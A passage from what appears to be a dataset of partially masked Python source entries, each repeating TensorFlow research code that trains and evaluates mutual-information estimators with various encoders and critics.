transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = 
loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n 
self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - 
self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n 
g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, 
**kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
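The listing above defines infonce_lower_bound(scores) as log(batch_size) plus the mean of the diagonal minus a row-wise log-sum-exp of the critic matrix. The NumPy re-implementation below is a quick sanity check of that formula on a random critic matrix; it is an illustrative sketch, not code from the dataset.

import numpy as np
from scipy.special import logsumexp

def infonce_np(scores):
    # scores[i, j]: critic value for pair (x_i, y_j); the diagonal holds the joint pairs.
    n = scores.shape[0]
    nll = np.mean(np.diag(scores) - logsumexp(scores, axis=1))
    return np.log(n) + nll

rng = np.random.default_rng(0)
scores = rng.normal(size=(64, 64))
print(infonce_np(scores))                     # small (near zero or negative) for an uninformative critic
print(infonce_np(scores + 5.0 * np.eye(64)))  # larger when joint pairs score higher than marginals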
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. 
(2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return 
